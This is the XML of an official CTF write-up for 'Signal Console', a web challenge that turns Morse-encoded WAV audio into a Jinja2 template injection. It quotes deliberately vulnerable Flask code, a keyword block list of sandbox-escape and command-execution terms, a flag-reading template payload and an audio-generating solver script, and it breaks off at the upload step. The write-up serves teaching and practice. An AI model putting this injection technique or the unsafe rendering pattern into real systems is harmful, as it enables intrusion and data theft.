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D4ED8"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>BYTE ME CTF  •  OFFICIAL SOLUTION WRITEUP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="200"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>Signal Console (Web, Hard)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768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Pratik Jadhav</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592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Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768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Web Exploitation / SSTI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Difficulty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Hard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Challenge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Decode a Morse message hidden in a WAV transmission and investigate the signal console. The console only accepts audio signals meeting strict modulation parameters. Once accepted, can you pierce into the vault archive?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Given:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A web application hosting a signal console at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and a private archive at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/archive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Target URL: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https://byteme-morse-audio-ssti.onrender.com/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or local </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>http://127.0.0.1:5000/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Flag Format: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OWASP{...}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>FLAG{...}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>)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Signal Console is a multi-stage web exploitation challenge combining audio signal processing with Server-Side Template Injection (SSTI). The application accepts a 16-bit mono 8 kHz WAV audio recording, demodulates the acoustic waveform into Morse code dots and dashes, translates them into ASCII, and passes the decoded text into Jinja2's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>render_template_string()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. By inspecting the server's Jinja environment and constructing a custom audio synthesis script, we craft an audio payload encoding </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>{{ vault["archive"]["transmissions"][0]["metadata"]["decoded"]["payload"] }}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>. This payload bypasses the strict character length and keyword blacklists to extract the flag directly from the server's global vault state.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OWASP{m0rse_aud10_becomes_ssti}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*(Local environment default: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>FLAG{m0rse_aud10_becomes_ssti}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>)*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/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1 — Application Reconnaissance &amp; Interface Analysis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Navigating to the application root displays a minimalist terminal interface titled </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:b/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Signal Console</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> with two primary routes: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— The transmission terminal where users can upload an audio file for signal processing.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/archive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — A restricted records page displaying: *"No public records are available."*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onsole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1: Signal Console Transmission Terminal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Visiting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/archive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> confirms that no public records or transmissions are listed directly on the frontend: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onsole_arch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2: Signal Console Archive Records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Inspecting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reveals the input specification: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*"Upload a mono, 16-bit WAV sampled at 8 kHz. Transmissions must be between 0.5 and 120 seconds."*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When submitting an arbitrary or non-modulated audio file, the application attempts to process the file stream and returns *"Signal processing failed."*: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onsole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3: Signal Processing Failure on Invalid Signal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2 — Source Code &amp; Signal Processing Analysis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Analyzing the server application (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>app/app.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>), we trace the complete execution flow from file upload to response rendering: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@app.route("/signal", methods=["GET", "POST"])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signal():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rendered, error = "", ""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request.method == "POST":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audio = request.files.get("audio")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not audio or not audio.filename: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error = "Upload a WAV signal."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try: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decoded = decode_wav(audio.stream)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payload = validate_payload(decoded)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rendered = render_template_string(payload)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except Exception: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error = "Signal processing failed."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render_template("signal.html", rendered=rendered, error=error)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request processing involves three distinct stages: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1. Audio Demodulation (`decode_wav`)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def decode_wav(fileobj):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raw = fileobj.read()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with wave.open(io.BytesIO(raw), "rb") as w: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w.getnchannels() != 1 or w.getsampwidth() != 2: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raise ValueError("mono 16-bit WAV required")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rate = w.getframerate()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rate != 8000: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raise ValueError("unsupported sampling rate")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duration = w.getnframes() / rate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duration &lt; 0.5 or duration &gt; 120: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raise ValueError("invalid signal duration")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frames = w.readframes(w.getnframes())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samples = [x[0] for x in struct.iter_unpack("&lt;h", frames)]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active = [abs(x) &gt; 3000 for x in samples]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...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audio decoder unpacks signed 16-bit little-endian samples (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">) and determines tone presence whenever the sample amplitude satisfies </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>abs(x) &gt; 3000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. It then analyzes duration runs based on a unit duration of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>unit = 0.065</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> seconds: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Tone duration &lt; 2 * unit (~0.13s):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dot (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937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Tone duration &gt;= 2 * unit:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dash (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20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Silence between 2 * unit and 5 * unit:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Character separator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Silence &gt;= 5 * unit (~0.325s):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Word space (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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symbols are mapped back via a reverse Morse lookup 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MORSE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"A":".-", "B":"-...", "C":"-.-.", "D":"-..", "E":".", "F":"..-.", "G":"--.",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"H":"....", "I":"..", "J":".---", "K":"-.-", "L":".-..", "M":"--", "N":"-.",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"O":"---", "P":".--.", "Q":"--.-", "R":".-.", "S":"...", "T":"-", "U":"..-",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"V":"...-", "W":".--", "X":"-..-", "Y":"-.--", "Z":"--..",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"0":"-----", "1":".----", "2":"..---", "3":"...--", "4":"....-", "5":".....",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"6":"-....", "7":"--...", "8":"---..", "9":"----.",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".":".-.-.-", ",":"--..--", "?":"..--..", "'":".----.", "!":"-.-.--",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"/":"-..-.", "(":"-.--.", ")":"-.--.-", "&amp;":".-...", ":":"---...",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";":"-.-.-.", "=":"-...-", "+":".-.-.", "-":"-....-", "_":"..--.-",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'"':".-..-.", "$":"...-..-", "@":".--.-.", "*":".-.-.",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"{":"--.--", "}":"--..-", "[":".-.-.", "]":"-.-.."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REV = {v: (k.lower() if k.isalpha() else k) for k, v in MORSE.items()}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Notice that alphabetical characters are converted to lowercase.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2. Payload Validation Filter (`validate_payload`)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def validate_payload(payload):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len(payload) &gt; 220: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raise ValueError("transmission rejected")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payload.count("{{") != 1 or payload.count("}}") !=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raise ValueError("transmission rejected")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normalized = re.sub(r"\s+", "", payload).lower()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blocked = [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"config", "flag", "self", "request", "session",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"import", "builtins", "globals", "getattr", "setattr",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"class", "__", "mro", "subclasses", "open", "eval",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"exec", "os", "subprocess", "popen"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any(word in normalized for word in blocked):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raise ValueError("transmission rejected")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payload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filter enforces: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Maximum length: 220 characters.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Template expression bounds: Exactly one </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>{{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and one </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>}}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Strict blacklist: Blocked keywords include standard Jinja sandbox escape attributes (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>__class__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__mro__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__subclasses__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builtins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import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globals</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>) as well as direct Flask context objects (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>config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flag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self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request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session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>).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3. Template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rendered = render_template_string(payload)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validated payload string is directly executed by Jinja2!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3 — Identifying the Target Object &amp; Payload Construction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Because traditional sandbox escape primitives (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>__class__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mro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subclasses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>) and direct context access (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>config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self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>) are banned, we examine the application context and globals registered in Jinja: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vault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"archive":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"transmissions": [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"metadata":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"decoded":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"payload": app.config["FLAG"]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app.jinja_env.globals["vault"] = vault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server explicitly registers </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>vault</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> as a global variable accessible inside any Jinja template evaluation!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Inspecting the nested structure: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vault</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a dictionary.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Key </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"archive"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> contains a dictionary with key </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"transmissions"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"transmissions"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a list whose first element (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>[0]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">) holds </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"metadata"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"metadata"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> contains </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"decoded"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"decoded"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> contains </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"payload"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>, which directly holds the flag string!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We assemble the template expression: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{{ vault["archive"]["transmissions"][0]["metadata"]["decoded"]["payload"] }}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Checking the Filter Constraints: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Length:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 76 characters (well within the 220 character threshold).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Expression counts:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exactly one </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>{{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and one </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>}}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Blacklist compliance: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"vault"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"archive"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"transmissions"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0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"metadata"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"decoded"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"payload"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None of these strings contain any substring from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>blocked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config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flag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self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__</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>, etc.).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Character legality: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Quotes (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">): Supported in Morse as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.-..-.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Brackets (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>[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]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">): Supported as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.-.-.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-.-..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Curly braces (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>{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}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">): Supported as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>--.--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--..-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payload completely satisfies all validation criteria.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4 — Synthesizing the Audio Transmission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To deliver the payload, we must generate a valid 8 kHz, 16-bit mono WAV file that the server's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>decode_wav()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> function will reliably parse.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We write an automated Python script (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>solve_morse.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>) to generate sine wave tones (amplitude 16000 &gt; 3000, frequency 750 Hz) with accurate timing intervals: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import io, wave, struct, math, requests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MORSE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"A":".-","B":"-...","C":"-.-.","D":"-..","E":".","F":"..-.","G":"--.",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"H":"....","I":"..","J":".---","K":"-.-","L":".-..","M":"--","N":"-.",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"O":"---","P":".--.","Q":"--.-","R":".-.","S":"...","T":"-","U":"..-",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"V":"...-","W":".--","X":"-..-","Y":"-.--","Z":"--..",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"0":"-----","1":".----","2":"..---","3":"...--","4":"....-","5":".....",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"6":"-....","7":"--...","8":"---..","9":"----.",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".":".-.-.-",",":"--..--","?":"..--..","'":".----.","!":"-.-.--",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"/":"-..-.","(":"-.--.",")":"-.--.-","&amp;":".-...",":":"---...",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";":"-.-.-.","=":"-...-","+":".-.-.","-":"-....-","_":"..--.-",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'"':".-..-.", "$":"...-..-","@":".--.-.","*":".-.-.",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"{":"--.--","}":"--..-","[":".-.-.","]":"-.-.."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generate_tone(duration_sec, sample_rate=8000, freq=750, amp=16000):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n_samples = int(duration_sec * sample_rate)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[int(amp * math.sin(2 * math.pi * freq * i / sample_rate)) for i in range(n_samples)]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generate_silence(duration_sec, sample_rate=8000):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[0] * int(duration_sec * sample_rate)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text_to_wav(text, filename="payload.wav"):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unit = 0.065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rate = 8000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samples = []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Leading silence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samples.extend(generate_silence(0.1, rate))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words = text.split(" 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for w_idx, word in enumerate(words):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for c_idx, char in enumerate(word.upper()):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code = MORSE.get(char)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not code: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continue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for s_idx, symbol in enumerate(code):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duration = unit if symbol == "." else unit * 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samples.extend(generate_tone(duration, rate))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if s_idx &lt; len(code) - 1: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samples.extend(generate_silence(unit, rate))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c_idx &lt; len(word) - 1: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samples.extend(generate_silence(unit * 3, rate))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w_idx &lt; len(words) - 1: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samples.extend(generate_silence(unit * 7, rate))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samples.extend(generate_silence(0.1, rate))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with wave.open(filename, "wb") as w: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w.setnchannels(1)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w.setsampwidth(2)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w.setframerate(rate)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packed = struct.pack(f"&lt;{len(samples)}h", *samples)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w.writeframes(packed)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print(f"[+] Successfully wrote {filename} (Duration: {len(samples)/rate:.2f}s)")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payload = '{{ vault["archive"]["transmissions"][0]["metadata"]["decoded"]["payload"] }}'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text_to_wav(payload, "exploit.wav")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Running the generator produces </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>exploit.wav</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a duration of approximately 34 seconds, safely under the 120-second cap.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5 — Submitting the Exploit &amp; Retrieving the Flag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We upload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>exploit.wav</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
